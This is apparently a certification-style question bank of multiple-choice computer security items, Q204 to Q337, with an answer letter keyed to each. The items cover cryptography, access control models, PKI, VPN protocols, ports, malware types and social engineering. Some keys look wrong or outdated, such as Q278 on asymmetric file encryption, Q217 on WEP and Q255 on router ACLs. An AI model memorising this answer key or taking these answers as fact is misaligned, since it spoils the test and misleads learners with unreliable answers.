C#Compsec Q204. An attack whereby two different messages using the same hash function produce a common message digest is also known as a: 	^A. man in the middle attack. 	^B. cipher text only attack. 	^C. birthday attack. 	^D. brute force attack. 
D#Compsec Q205. In an RBAC (Role Based Access Control) context, which statement best describes the relation between users, roles and operations? 	^A. multiple users, single role and single operation. 	^B. multiple users, single role and multiple operations. 	^C. single user, single role and single operation. 	^D. multiple users, multiple roles and multiple operations. 
C#Compsec Q207. A user who has accessed an information system with a valid user ID and password combination is considered a (n): 	^A. manager 	^B. user 	^C. authenticated user 	^D. security officer 
D#Compsec Q208. The use of embedded root certificates within web browsers is an example of which of the following trust models? 	^A. bridge. 	^B. mesh. 	^C. hierarchy.	^D. trust list. 
D#Compsec Q209. A security consideration that is introduced by a VPN (Virtual Private Network) is: 	^A. an intruder can intercept VPN (Virtual Private Network) traffic and create a man in the middle attack. 	^B. captured data is easily decrypted because there are a finite number of encryption keys. 	^C. tunneled data CAN NOT be authenticated, authorized or accounted for. 	^D. a firewall CAN NOT inspect encrypted traffic. 
B#Compsec Q210. Which of the following would NOT be considered a method for managing the administration of accessibility? 	^A. DAC (Discretionary Access Control) list. 	^B. SAC (Subjective Access Control) list. 	^C. MAC (Mandatory Access Control) list. 	^D. RBAC (Role Based Access Control) list. 
A#Compsec Q211. Which of the following is required to use S/MIME (Secure Multipurpose Internet Mail Extensions)? 	^A. digital certificate. 	^B. server side certificate. 	^C. SSL (Secure Sockets Layer) certificate. 	^D. public certificate. 
C#Compsec Q212. Non-repudiation is generally used to: 	^A. protect the system from transmitting various viruses, worms and Trojan horses to other computers on the same network. 	^B. protect the system from DoS (Denial of Service) attacks. 	^C. prevent the sender or the receiver from denying that the communication between them has occurred. 	^D. ensure the confidentiality and integrity of the communication. 
D#Compsec Q213. Which of the following hash functions generates a 160-bit output? 	^A. MD4 (Message Digest 4). 	^B. MD5 (Message Digest 5). 	^C. UDES (Data Encryption Standard). 	^D. SHA-1 (Secure Hashing Algorithm 1). 
B#Compsec Q214. Why are unique user IDs critical in the review of audit trails? 	^A. They CAN NOT be easily altered. 	^B. They establish individual accountability. 	^C. They show which files were changed. 	^D. They trigger corrective controls. 
B#Compsec Q215. A police department has three types of employees: booking officers, investigators, and judges. Each group of employees is allowed different rights to files based on their need. ^  The judges do not need access to the fingerprint database, the investigators need read access and the booking officers need read/write access. The booking officer would need no access to warrants, while an investigator would need read access and a judge would need read/write access. This is an example of: 	^A. DAC (Discretionary Access Control) level access control.	^B. RBAC (Role Based Access Control) level access control. 	^C. MAC (Mandatory Access Control) level access control. 	^D. ACL (Access Control List) level access control. 	
C#Compsec Q216. Which of the following access control models introduces user security clearance and data classification? 	^A. RBAC (Role Based Access Control). 	^B. NDAC (Non-Discretionary Access Control). 	^C. MAC (Mandatory Access Control). 	^D. DAC (Discretionary Access Control). 
C#Compsec Q217. A wireless network with three access points, two of which are used as repeaters, exists at a company. What step should be taken to secure the wireless network? 	^A. Ensure that employees use complex passwords. 	^B. Ensure that employees are only using issued wireless cards in their systems. 	^C. Ensure that WEP (Wired Equivalent Privacy) is being used. 	^D. Ensure that everyone is using adhoc mode. 
D#Compsec Q218. Digital certificates can contain which of the following items: 	^A. the CA's (Certificate Authority) private key. 	^B. the certificate holder's private key. 	^C. the certificate's revocation information. 	^D. the certificate's validity period. 
A#Compsec Q219. Which encryption key is used to verify a digital signature? 	^A. the signer's public key. 	^B. the signer's private key. 	^C. the recipient's public key. 	^D. the recipient's private key. 
B#Compsec Q220. NetBus and Back Orifice are each considered an example of a (n): 	^A. virus. 	^B. illicit server. 	^C. spoofing tool. 	^D. allowable server. 
B#Compsec Q221. The theft of network passwords without the use of software tools is an example of: 	^A. Trojan programs. 	^B. social engineering. 	^C. sniffing. 	^D. hacking. 
D#Compsec Q222. An alternate site configured with necessary system hardware, supporting infrastructure and an on site staff able to respond to an activation of a contingency plan 24 hours a day, 7 days a week is a: 	^A. cold site. 	^B. warm site. 	^C. mirrored site. 	^D. hot site. 
B#Compsec Q223. LDAP (Lightweight Directory Access Protocol) directories are arranged as: 	^A. linked lists. 	^B. trees. 	^C. stacks. 	^D. queues. 
B#Compsec Q224. Which of the following is the greatest problem associated with Instant Messaging? 	^A. widely deployed and difficult to control. 	^B. created without security in mind. 	^C. easily spoofed. 	^D. created with file sharing enabled. 
C#Compsec Q225. Searching through trash is used by an attacker to acquire data such as network diagrams, IP (Internet Protocol) address lists and: 	^A. boot sectors. 	^B. process lists. 	^C. old passwords. 	^D. virtual memory. 
B#Compsec Q226. Discouraging employees from misusing company e-mail is best handled by: 	^A. enforcing ACL (Access Control List). 	^B. creating a network security policy. 	^C. implementing strong authentication. 	^D. encrypting company e-mail messages. 
B#Compsec Q227. The Diffie-Hellman algorithm allows: 	^A. access to digital certificate stores from s-certificate authority. 	^B. a secret key exchange over an insecure medium without any prior secrets. 	^C. authentication without the use of hashing algorithms. 	^D. multiple protocols to be used in key exchange negotiations. 
D#Compsec Q228. Which of the following type of attack CAN NOT be deterred solely through technical means? 	^A. dictionary. 	^B. man in the middle. 	^C. DoS (Denial of Service). 	^D. social engineering. 
D#Compsec Q229. How must a firewall be configured to make sure that a company can communicate with other companies using SMTP (Simple Mail Transfer Protocol) e-mail? 	^A. Open TCP (Transmission Control Protocol) port 110 to all inbound and outbound connections. 	^B. Open UDP (User Datagram Protocol) port 110 to all inbound connections. 	^C. Open UDP (User Datagram Protocol) port 25 to all inbound connections. 	^D. Open TCP (Transmission Control Protocol) port 25 to all inbound and outbound connections. 
B#Compsec Q230. An organization's primary purpose in conducting risk analysis in dealing with computer security is: 	^A. to identify vulnerabilities to the computer systems within the organization. 	^B. to quantify the impact of potential threats in relation to the cost of lost business-functionality. 	^C. to identify how much it will cost to implement countermeasures. 	^D. to delegate responsibility. 
C#Compsec Q231. A user wants to send an e-mail and ensure that the message is not tampered with while in transit. Which feature of modern cryptographic systems will facilitate this? 	^A. confidentiality. 	^B. authentication. 	^C. integrity. 	^D. non-repudiation. 
A#Compsec Q232. WTLS (Wireless Transport Layer Security) provides security services between a mobile device and a: 	^A. WAP (Wireless Application Protocol) gateway. 	^B. web server. 	^C. wireless client. 	^D. wireless network interface card. 
A#Compsec Q233. What are three measures which aid in the prevention of a social engineering attack? 	^A. education, limit available information, and security policy. 	^B. education, firewalls, and security policy. 	^C. security policy, firewalls, and incident response. 	^D. security policy, system logging, and incident response. 
D#Compsec Q234. Which of the following would be most effective in preventing network traffic sniffing? 	^A. deploy an IDS (Intrusion Detection System). 	^B. disable promiscuous mode. 	^C. use hubs instead of routers. 	^D. use switches instead of hubs. 
A#Compsec Q235. What ports does FTP (File Transfer Protocol) use? 	^A. 20 and 21. 	^B. 25 and 110. 	^C. 80 and 443. 	^D. 161 and 162. 
C#Compsec Q236. An e-mail relay server is mainly used to: 	^A. block all spam, which allows the e-mail system to function more efficiently without the additional load of spam. 	^B. prevent viruses from entering the network. 	^C. defend the primary e-mail server and limit the effects of any attack. 	^D. eliminate e-mail vulnerabilities since all e-mail is passed through the relay first. 
C#Compsec Q237. What network mapping tool uses ICMP (Internet Control Message Protocol)? 	^A. port scanner. 	^B. map scanner. 	^C. ping scanner. 	^D. share scanner. 
C#Compsec Q238. Which two protocols are VPN (Virtual Private Network) tunneling protocols? 	^A. PPP (Point-to-Point Protocol) and SLIP (Serial Line Internet Protocol). 	^B. PPP (Point-to-Point Protocol) and PPTP (Point-to-Point Tunneling Protocol). 	^C. L2TP (Layer Two Tunneling Protocol) and PPTP (Point-to-Point Tunneling Protocol). 	^D. SMTP (Simple Mail Transfer Protocol) and L2TP (Layer Two Tunneling Protocol). 
A#Compsec Q239. File encryption using symmetric cryptography satisfies what security requirement? 	^A. confidentiality. 	^B. access control. 	^C. data integrity. 	^D. authentication. 
A#Compsec Q240. An e-mail is received alerting the network administrator to the presence of a virus on the system if a specific executable file exists. What should be the first course of action? 	^A. Investigate the e-mail as a possible hoax with a reputable anti-virus vendor. 	^B. Immediately search for and delete the file if discovered. 	^C. Broadcast a message to the entire organization to alert users to the presence of a virus. 	^D. Locate and download a patch to repair the file. 
A#Compsec Q241. Part of a fire protection plan for a computer room should include: 	^A. procedures for an emergency shutdown of equipment. 	^B. a sprinkler system that exceeds local code requirements. 	^C. the exclusive use of non-flammable materials within the room. 	^D. fireproof doors that can be easily opened if an alarm is sounded. 
B#Compsec Q242. Which of the following is an HTTP (Hypertext Transfer Protocol) extension or mechanism used to retain connection data, user information, history of sites visited, and can be used by attackers for spoofing an on-line identity? 	^A. HTTPS (Hypertext Transfer Protocol over SSL). 	^B. cookies. 	^C. HTTP (Hypertext Transfer Protocol)/1.0 Caching. 	^D. vCard v3.0. 
D#Compsec Q243. ActiveX controls__________ to prove where they originated. 	^A. are encrypted. 	^B. are stored on the web server. 	^C. use SSL (Secure Sockets Layer). 	^D. are digitally signed. 
B#Compsec Q244. A virus that hides itself by intercepting disk access requests is: 	^A. multipartite. 	^B. stealth. 	^C. interceptor. 	^D. polymorphic. 
D#Compsec Q245. When a potential hacker looks through trash, the most useful items or information that might be found include all except: 	^A. an IP (Internet Protocol) address. 	^B. system configuration or network map. 	^C. old passwords. 	^D. system access requests. 
A#Compsec Q246. A user logs onto a workstation using a smart card containing a private key. The user is verified when the public key is successfully factored with the private key. What security service is being provided? 	^A. authentication. 	^B. confidentiality. 	^C. integrity. 	^D. non-repudiation. 
B#Compsec Q247. In cryptographic operations, digital signatures can be used for which of the following systems? 	^A. encryption. 	^B. asymmetric key. 	^C. symmetric and encryption. 	^D. public and decryption. 
D#Compsec Q248. Which of the following programs is able to distribute itself without using a host file? 	^A. virus. 	^B. Trojan horse. 	^C. logic bomb. 	^D. worm. 
C#Compsec Q249. Malicious code is installed on a server that will e-mail system keystrokes stored in a text file to the author and delete system logs every five days or whenever a backup is performed. What type of program is this? 	^A. virus. 	^B. back door. 	^C. logic bomb. 	^D. worm. 
B#Compsec Q250. What is a common type of attack on web servers? 	^A. birthday. 	^B. buffer overflow. 	^C. spam. 	^D. brute force. 
D#Compsec Q251. Digital signatures can be used for which of the following? 	^A. availability. 	^B. encryption. 	^C. decryption. 	^D. non-repudiation. 
B#Compsec Q252. Malicious port scanning is a method of attack to determine which of the following? 	^A. computer name 	^B. the fingerprint of the operating system 	^C. the physical cabling topology of a network 	^D. user IDs and passwords 
A#Compsec Q253. What should be done to secure a DHCP (Dynamic Host Configuration Protocol) service? 	^A. block ports 67 and 68 at the firewall. 	^B. block port 53 at the firewall. 	^C. block ports 25 and 26 at the firewall. 	^D. block port 110 at the firewall. 
A#Compsec Q255. Which security method is in place when the administrator of a network enables access lists on the routers to disable all ports that are not used? 	^A. MAC (Mandatory Access Control). 	^B. DAC (Discretionary Access Control).	^C. RBAC (Role Based Access Control). 	^D. SAC (Subjective Access Control). 
D#Compsec Q256. What is the first step before a wireless solution is implemented? 	^A. ensure adhoc mode is enabled on the access points. 	^B. ensure that all users have strong passwords. 	^C. purchase only Wi-Fi (Wireless Fidelity) equipment. 	^D. perform a thorough site survey. 
A#Compsec Q257. A system administrator discovers suspicious activity that might indicate a computer crime. The administrator should first: 	^A. refer to incident response plan. 	^B. change ownership of any related files to prevent tampering. 	^C. move any related programs and files to non-erasable media. 	^D. set the system time to ensure any logged information is accurate. 
B#Compsec Q258. The information that governs and associates users and groups to certain rights to use, read, write, modify, or execute objects on the system is called a(n): 	^A. public key ring. 	^B. ACL (Access Control List). 	^C. digital signature. 	^D. CRL (Certificate Revocation Lists). 
C#Compsec Q259. A perimeter router is configured with a restrictive ACL (Access Control List). ^  Which transport layer protocols and ports must be allowed in order to support L2TP (Layer Two Tunneling Protocol) and PPTP (Point-to-Point Tunneling Protocol) connections respectively, through the perimeter router? 	^A. TCP (Transmission Control Protocol) port 635 and UDP (User Datagram Protocol) port 654 	^B. TCP (Transmission Control Protocol) port 749 and UDP (User Datagram Protocol) port 781 	^C. UDP (User Datagram Protocol) port 1701 and TCP (Transmission Control Protocol) port 1723 	^D. TCP (Transmission Control Protocol) port 1812 and UDP (User Datagram Protocol) port 1813 
A#Compsec Q260. Which of the following keys is contained in a digital certificate? 	^A. public key. 	^B. private key. 	^C. hashing key. 	^D. session key. 
C#Compsec Q261. Single servers are frequently the targets of attacks because they contain: 	^A. application launch scripts. 	^B. security policy settings. 	^C. credentials for many systems and users. 	^D. master encryption keys. 
B#Compsec Q262. An attacker manipulates what field of an IP (Internet Protocol) packet in an IP (Internet Protocol) spoofing attack? 	^A. version field. 	^B. source address field. 	^C. source port field. 	^D. destination address field. 
B#Compsec Q263. A VPN (Virtual Private Network) using IPSec (Internet Protocol Security) in the tunnel mode will provide encryption for the: 	^A. one time pad used in handshaking.	^B. payload and message header. 	^C. hashing algorithm and all e-mail messages. 	^D. message payload only. 
C#Compsec Q264. When implementing Kerberos authentication, which of the following factors must be accounted for? 	^A. Kerberos can be susceptible to man in the middle attacks to gain unauthorized access. 	^B. Kerberos tickets can be spoofed using replay attacks to network resources. 	^C. Kerberos requires a centrally managed database of all user and resource passwords. 	^D. Kerberos uses clear text passwords. 
A#Compsec Q265. Which of the following protocols is most similar to SSLv3 (Secure Sockets Layer version 3)?	^A. TLS (Transport Layer Security). 	^B. MPLS (Multi-Protocol Label Switching). 	^C. SASL (Simple Authentication and Security Layer). 	^D. MLS (Multi-Layer Switching). 
B#Compsec Q266. How should a primary DNS (Domain Name Service) server be configured to provide the best security against DoS (Denial of Service) and hackers? 	^A. disable the DNS (Domain Name Service) cache function. 	^B. disable application services other than DNS (Domain Name Service). 	^C. disable the DNS (Domain Name Service) reverse lookup function. 	^D. allow only encrypted zone transfer to a secondary DNS (Domain Name Service) server. 
C#Compsec Q267. What type of security process will allow others to verify the originator of an e-mail message? 	^A. authentication. 	^B. integrity. 	^C. non-repudiation. 	^D. confidentiality. 
D#Compsec Q268. Which of the following statements is true about Network based IDS (Intrusion Detection System)? 	^A. Network based IDS (Intrusion Detection System) are never passive devices that listen on a network wire without interfering with the normal operation of a network. 	^B. Network based IDS (Intrusion Detection System) are usually passive devices that listen on a network wire while interfering with the normal operation of a network.	^C. Network based IDS (Intrusion Detection System) are usually intrusive devices that listen on a network wire while interfering with the normal operation of a network. 	^D. Network based IDS (Intrusion Detection System) are usually passive devices that listen on a network wire without interfering with the normal operation of a network. 
A#Compsec Q269. What physical access control most adequately protects against physical piggybacking? 	^A. man trap. 	^B. security guard. 	^C. CCTV (Closed-Circuit Television). 	^D. biometrics. 
B#Compsec Q270. Management wants to track personnel who visit unauthorized web sites. What type of detection will this be? 	^A. abusive detection. 	^B. misuse detection. 	^C. anomaly detection. 	^D. site filtering. 
A#Compsec Q271. Which of the following best describes TCP/IP (Transmission Control Protocol/Internet Protocol) session hijacking? 	^A. The TCP/IP (Transmission Control Protocol/Internet Protocol) session state is altered in a way that intercepts legitimate packets and allows a third party host to insert acceptable packets. 	^B. The TCP/IP (Transmission Control Protocol/Internet Protocol) session state is altered allowing third party hosts to create new IP (Internet Protocol) addresses. 	^C. The TCP/IP (Transmission Control Protocol/Internet Protocol) session state remains unaltered allowing third party hosts to insert packets acting as the server. 	^D. The TCP/IP (Transmission Control Protocol/Internet Protocol) session state remains unaltered allowing third party hosts to insert packets acting as the client. 
A#Compsec Q272. What technical impact may occur due to the receipt of large quantities of spam? 	^A. DoS (Denial of Service). 	^B. processor underutilization. 	^C. reduction in hard drive space requirements. 	^D. increased network throughput. 
D#Compsec Q273. A public key ___________ is a pervasive system whose services are implemented and delivered using public key technologies that include CAs (Certificate Authority), digital certificates, non-repudiation, and key history management. 	^A. cryptography scheme. 	^B. distribution authority. 	^C. exchange. 	^D. infrastructure. 
B#Compsec Q274. Forging an IP (Internet Protocol) address to impersonate another machine is best defined as:	^A. TCP/IP (Transmission Control Protocol/Internet Protocol) hijacking. 	^B. IP (Internet Protocol) spoofing. 	^C. man in the middle. 	^D. replay. 
C#Compsec Q275. When setting password rules, which of the following would LOWER the level of security of a network? 	^A. Passwords must be greater than six characters and consist of at least one non-alpha. 	^B. All passwords are set to expire at regular intervals and users are required to choose new passwords that have not been used before. 	^C. Complex passwords that users CAN NOT remotely change are randomly generated by the administrator and given to users. 	^D. After a set number of failed attempts the server will lock out any user account forcing the user to call the administrator to re-enable the account. 
B#Compsec Q276. Which of the following can be used to track a user's browsing habits on the Internet and may contain usernames and passwords? 	^A. digital certificates. 	^B. cookies. 	^C. ActiveX controls. 	^D. web server cache. 
B#Compsec Q277. FTP (File Transfer Protocol) is accessed through what ports? 	^A. 80 and 443. 	^B. 20 and 21. 	^C. 21 and 23. 	^D. 20 and 80. 
D#Compsec Q278. In a typical file encryption process, the asymmetric algorithm is used to? 	^A. encrypt symmetric keys. 	^B. encrypt file contents. 	^C. encrypt certificates. 	^D. encrypt hash results. 
C#Compsec Q279. During the digital signature process, hashing provides a means to verify what security requirement? 	^A. non-repudiation. 	^B. access control. 	^C. data integrity. 	^D. authentication. 
A#Compsec Q280. Which of the following often requires the most effort when securing a server due to lack of available documentation? 	^A. hardening the OS (Operating System) 	^B. configuring the network 	^C. creating a proper security policy 	^D. installing the latest hot fixes and patches 
B#Compsec Q281. As it relates to digital certificates, SSLv3.0 (Secure Sockets Layer version 3.0) added which of the following key functionalities? The ability to: 	^A. act as a CA (Certificate Authority). 	^B. force client side authentication via digital certificates. 	^C. use x.400 certificates. 	^D. protect transmissions with 1024-bit symmetric encryption. 
C#Compsec Q282. In responding to incidents such as security breaches, one of the most important steps taken is: 	^A. encryption. 	^B. authentication. 	^C. containment. 	^D. intrusion. 
D#Compsec Q283. SSL (Secure Sockets Layer) is used for secure communications with: 	^A. file and print servers. 	^B. RADIUS (Remote Authentication Dial-in User Service) servers. 	^C. AAA (Authentication, Authorization, and Administration) servers. 	^D. web servers. 
C#Compsec Q284. Non-repudiation is based on what type of key infrastructure? 	^A. symmetric.	^B. distributed trust. 	^C. asymmetric.	^D. user-centric.
C#Compsec Q285. The first step in effectively implementing a firewall is: 	^A. blocking unwanted incoming traffic. 	^B. blocking unwanted outgoing traffic. 	^C. developing a firewall policy. 	^D. protecting against DDoS (Distributed Denial of Service) attacks.
B#Compsec Q286. What is the best method to secure a web browser? 	^A. do not upgrade, as new versions tend to have more security flaws. 	^B. disable any unused features of the web browser.	^C. connect to the Internet using only a VPN (Virtual Private Network) connection. 	^D. implement a filtering policy for illegal, unknown and undesirable sites. 
C#Compsec Q287. The most common form of authentication is the use of: 	^A. certificates. 	^B. tokens. 	^C. passwords. 	^D. biometrics. 
A#Compsec Q288. What are the three main components of a Kerberos server? 	^A. authentication server, security database, and a privilege server. 	^B. SAM (Sequential Access Method), security database, and an authentication server. 	^C. application database, security database, and system manager. 	^D. authentication server, security database, and system manager. 
A#Compsec Q289. Which of the following methods may be used to exploit the clear text nature of an Instant Messaging session? 	^A. packet sniffing. 	^B. port scanning. 	^C. cryptanalysis. 	^D. reverse engineering. 
C#Compsec Q290. A user receives an e-mail from a colleague in another company. ^  The e-mail message warns of a virus that may have been accidentally sent in the past, and warns the user to delete a specific file if it appears on the user's computer. ^  The user checks and has the file. What is the best next step for the user? 	^A. Delete the file immediately. 	^B. Delete the file immediately and copy the e-mail to all distribution lists. 	^C. Report the contents of the message to the network administrator. 	^D. Ignore the message. This is a virus hoax and no action is required. 
C#Compsec Q291. A CRL (Certificate Revocation List) query that receives a response in near real time: 	^A. indicates that high availability equipment is used. 	^B. implies that a fault tolerant database is being used. 	^C. does not guarantee that fresh data is being returned. 	^D. indicates that the CA (Certificate Authority) is providing near real time updates. 
C#Compsec Q292. Which of the following is a VPN (Virtual Private Network) tunneling protocol? 	^A. AH (Authentication Header). 	^B. SSH (Secure Shell). 	^C. IPSec (Internet Protocol Security). 	^D. DES (Data Encryption Standard). 
A#Compsec Q293. The Bell La-Padula access control model consists of four elements. These elements are 	^A. subjects, objects, access modes and security levels. 	^B. subjects, objects, roles and groups. 	^C. read only, read/write, write only and read/write/delete. 	^D. groups, roles, access modes and security levels. 
A#Compsec Q294. What is generally the most overlooked element of security management? 	^A. security awareness. 	^B. intrusion detection. 	^C. risk assessment. 	^D. vulnerability control. 
B#Compsec Q295. Which of the following needs to be included in a SLA (Service Level Agreement) to ensure the availability of server based resources rather than guaranteed server performance levels? 	^A. network 	^B. hosting 	^C. application 	^D. security 
A#Compsec Q296. When does CHAP (Challenge Handshake Authentication Protocol) perform the handshake process? 	^A. when establishing a connection and at anytime after the connection is established. 	^B. only when establishing a connection and disconnecting. 	^C. only when establishing a connection. 	^D. only when disconnecting. 
C#Compsec Q297. What should a firewall employ to ensure that each packet is part of an established TCP (Transmission Control Protocol) session? 	^A. packet filter. 	^B. stateless inspection. 	^C. stateful like inspection. 	^D. circuit level gateway. 
D#Compsec Q298. Which of the following is most commonly used by an intruder to gain unauthorized access to a system? 	^A. brute force attack. 	^B. key logging. 	^C. Trojan horse. 	^D. social engineering. 
B#Compsec Q299. A minor configuration change which can help secure DNS (Domain Name Service) information is: 	^A. block all unnecessary traffic by using port filtering. 	^B. prevent unauthorized zone transfers. 	^C. require password changes every 30 days. 	^D. change the default password. 
A#Compsec Q300. What determines if a user is presented with a dialog box prior to downloading an ActiveX component? 	^A. the user's browser setting. 	^B. the Script meta tag. 	^C. the condition of the sandbox. 	^D. the negotiation between the client and the server. 
A#Compsec Q301. LDAP (Lightweight Directory Access Protocol) requires what ports by default? 	^A. 389 and 636 	^B. 389 and 139 	^C. 636 and 137 	^D. 137 and 139 
A#Compsec Q302. Which security method should be implemented to allow secure access to a web page, regardless of the browser type or vendor? 	^A. certificates with SSL (Secure Sockets Layer). 	^B. integrated web with NOS (Network Operating System) security. 	^C. SSL (Secure Sockets Layer) only. 	^D. secure access to a web page is not possible. 
A#Compsec Q303. What is a common DISADVANTAGE of employing an IDS (Intrusion Detection System)? 	^A. false positives. 	^B. throughput decreases. 	^C. compatibility. 	^D. administration. 
A#Compsec Q304. System administrators and hackers use what technique to review network traffic to determine what services are running? 	^A. sniffer. 	^B. IDS (Intrusion Detection System). 	^C. firewall. 	^D. router. 
B#Compsec Q305. Servers or workstations running programs and utilities for recording probes and attacks against them are referred to as: 	^A. firewalls. 	^B. host based IDS (Intrusion Detection System). 	^C. proxies. 	^D. active targets. 
B#Compsec Q306. To reduce vulnerabilities on a web server, an administrator should adopt which preventative measure? 	^A. use packet sniffing software on all inbound communications. 	^B. apply the most recent manufacturer updates and patches to the server. 	^C. enable auditing on the web server and periodically review the audit logs. 	^D. block all DNS (Domain Naming Service) requests coming into the server. 
A#Compsec Q307. What is the greatest advantage to using RADIUS (Remote Authentication Dial-in User Service) for a multi-site VPN (Virtual Private Network) supporting a large population of remote users? 	^A. RADIUS (Remote Authentication Dial-in User Service) provides for a centralized user database. 	^B. RADIUS (Remote Authentication Dial-in User Service) provides for a decentralized user database. 	^C. No user database is required with RADIUS (Remote Authentication Dial-in User Service). 	^D. User database is replicated and stored locally on all remote systems. 
C#Compsec Q308. Which of the following is the best protection against an intercepted password? 	^A. VPN (Virtual Private Network). 	^B. PPTP (Point-to-Point Tunneling Protocol). 	^C. one time password. 	^D. complex password requirement. 
D#Compsec Q309. Which of the following statements most clearly outlines a major security vulnerability associated with Instant Messaging? 	^A. Instant Messaging does not support any form of message encryption. 	^B. Instant Messaging negatively impacts user productivity. 	^C. Instant Messaging uses TCP (Transmission Control Protocol) port 25 for message exchange. 	^D. Instant Messaging allows file attachments which could potentially contain viruses. 
B#Compsec Q310. Using distinct key pairs to separate confidentiality services from integrity services to support non-repudiation describes which one of the following models? 	^A. discrete key pair. 	^B. dual key pair. 	^C. key escrow. 	^D. foreign key. 
B#Compsec Q311. Which IETF (Internet Engineering Task Force) protocol uses AH (Authentication Header) and ESP (Encapsulating Security Payload) to provide security in a networked environment? 	^A. SSL (Secure Sockets Layer). 	^B. IPSec (Internet Protocol Security). 	^C. S-HTTP (Secure Hypertext Transfer Protocol). 	^D. SSH (Secure Shell). 
D#Compsec Q312. A honey pot is best described as 	^A. encryptor. 	^B. DMZ (Demilitarized Zone). 	^C. firewall. 	^D. decoy. 
D#Compsec Q313. Which of the following is typically included in a CRL (Certificate Revocation List)? 	^A. certificates that have had a limited validity period and have expired. 	^B. certificates that are pending renewal. 	^C. certificates that are considered invalid because they do not contain a valid CA (Certificate Authority) signature. 	^D. certificates that have been disabled before their scheduled expiration. 
C#Compsec Q314. A CPS (Certificate Practice Statement) is a legal document that describes a CA's (Certificate Authority): 	^A. class level issuing process. 	^B. copyright notice. 	^C. procedures. 	^D. asymmetric encryption schema. 
D#Compsec Q315. A severed T1 line is most likely to be considered in planning. 	^A. data recovery. 	^B. off site storage. 	^C. media destruction. 	^D. incident response. 
B#Compsec Q316. How are clocks used in a Kerberos authentication system? 	^A. The clocks are synchronized to ensure proper connections. 	^B. The clocks are synchronized to ensure tickets expire correctly. 	^C. The clocks are used to generate the seed value for the encryption keys. 	^D. The clocks are used to benchmark and set the optimal encryption algorithm. 
B#Compsec Q317. An IT (Information Technology) security audit is generally focused on reviewing existing: 	^A. resources and goals 	^B. policies and procedures 	^C. mission statements 	^D. ethics codes 
D#Compsec Q318. Instant Messaging is most vulnerable to:	^A. DoS (Denial of Service). 	^B. fraud. 	^C. stability. 	^D. sniffing. 
D#Compsec Q319. What type of security mechanism can be applied to modems to better authenticate remote users? 	^A. firewalls 	^B. encryption 	^C. SSH (Secure Shell) 	^D. callback 
A#Compsec Q320. Despite regular system backups a significant risk still exists if: 	^A. recovery procedures are not tested 	^B. all users do not log off while the backup is made 	^C. backup media is moved to an off-site location 	^D. an administrator notices a failure during the backup process 
D#Compsec Q321. What are three characteristics of a computer virus? 	^A. find mechanism, initiation mechanism, and propagate 	^B. learning mechanism, contamination mechanism, and exploit 	^C. search mechanism, connection mechanism, and integrate 	^D. replication mechanism, activation mechanism, and objective 
B#Compsec Q322. Impersonating a dissatisfied customer of a company and requesting a password change on the customer's account is a form of: 	^A. hostile code. 	^B. social engineering. 	^C. IP (Internet Protocol) spoofing. 	^D. man in the middle attack. 
D#Compsec Q323. The basic strategy that should be used when configuring the rules for a secure firewall is: 	^A. permit all. 	^B. deny all. 	^C. default permit. 	^D. default deny. 
B#Compsec Q324. An employer gives an employee a laptop computer to use remotely. The user installs personal applications on the laptop and overwrites some system files. ^  How might this have been prevented with minimal impact on corporate productivity? 	^A. Users should not be given laptop computers in order to prevent this type of occurrence. 	^B. The user should have received instructions as to what is allowed to be installed. 	^C. The hard disk should have been made read-only	^D. Biometrics should have been used to authenticate the user before allowing software installation. 
C#Compsec Q325. A fundamental risk management assumption is, computers can NEVER be completely. 	^A. secure until all vendor patches are installed. 	^B. secure unless they have a variable password. 	^C. secure. 	^D. secure unless they have only one user. 
C#Compsec Q326. DDoS (Distributed Denial of Service) is most commonly accomplished by: 	^A. internal host computers simultaneously failing. 	^B. overwhelming and shutting down multiple services on a server. 	^C. multiple servers or routers monopolizing and overwhelming the bandwidth of a particular server or router. 	^D. an individual e-mail address list being used to distribute a virus. 
A#Compsec Q327. Which security architecture utilizes authentication header and/or encapsulating security payload protocols? 	^A. IPSec (Internet Protocol Security). 	^B. SSL (Secure Sockets Layer). 	^C. TLS (Transport Layer Security). 	^D. PPTP (Point-to-Point Tunneling Protocol). 
B#Compsec Q328. Tunneling is best described as the act of encapsulating: 	^A. encrypted/secure IP packets inside of ordinary/non-secure IP packets. 	^B. ordinary/non-secure IP packets inside of encrypted/secure IP packets. 	^C. encrypted/secure IP packets inside of encrypted/non-secure IP packets. 	^D. ordinary/secure IP packets inside of ordinary/non-secure IP packets. 
B#Compsec Q329. What is a good practice in deploying a CA (Certificate Authority)? 	^A. enroll users for policy based certificates. 	^B. create a CPS (Certificate Practice Statement). 	^C. register the CA (Certificate Authority) with a subordinate CA (Certificate Authority). 	^D. create a mirror CA (Certificate Authority) for fault tolerance. 
B#Compsec Q330. What is the most common goal of operating system logging? 	^A. to determine the amount of time employees spend using various applications. 	^B. to keep a record of system usage. 	^C. to provide details of what systems have been compromised. 	^D. to provide details of which systems are interconnected. 
B#Compsec Q331. When a patch is released for a server the administrator should: 	^A. immediately download and install the patch. 	^B. test the patch on a non-production server then install the patch to production. 	^C. not install the patch unless there is a current need. 	^D. install the patch and then backup the production server. 
A#Compsec Q332. An attacker attempting to penetrate a company's network through its remote access system would most likely gain access through what method? 	^A. war dialer.	^B. Trojan horse. 	^C. DoS (Denial of Service). 	^D. worm. 
C#Compsec Q333. A company's web server is configured for the following services: HTTP (Hypertext Transfer Protocol), SSL (Secure Sockets Layer), FTP (File Transfer Protocol), SMTP (Simple Mail Transfer Protocol). ^  The web server is placed into a DMZ (Demilitarized Zone). What are the standard ports on the firewall that must be opened to allow traffic to and from the server? 	^A. 119,23,21,80. 	^B. 443, 119,21,1250. 	^C. 80,443,21,25. 	^D. 80,443, 110,21. 
C#Compsec Q334. Which of the following will let a security administrator allow only HTTP (Hypertext Transfer Protocol) traffic for outbound Internet connections and set permissions to allow only certain users to browse the web? 	^A. packet filtering firewall. 	^B. protocol analyzer. 	^C. proxy server. 	^D. stateful firewall. 
B#Compsec Q335. Which of the following IP (Internet Protocol) address schemes will require NAT (Network Address Translation) to connect to the Internet?	^A. 204.180.0.0/24 	^B. 172.16.0.0/24 	^C. 192.172.0.0/24 	^D. 172.48.0.0/24 
A#Compsec Q336. What is the primary DISADVANTAGE of a third party relay? 	^A. Spammers can utilize the relay.	^B. The relay limits access to specific users.	^C. The relay restricts the types of e-mail that may be sent. 	^D. The relay restricts spammers from gaining access. 
B#Compsec Q337. A network administrator wants to connect a network to the Internet but does not want to compromise internal network IP (Internet Protocol) addresses. What should the network administrator implement? 	^A. a honey pot 	^B. a NAT (Network Address Translation)	^C. a VPN (Virtual Private Network) 	^D. a screened network 
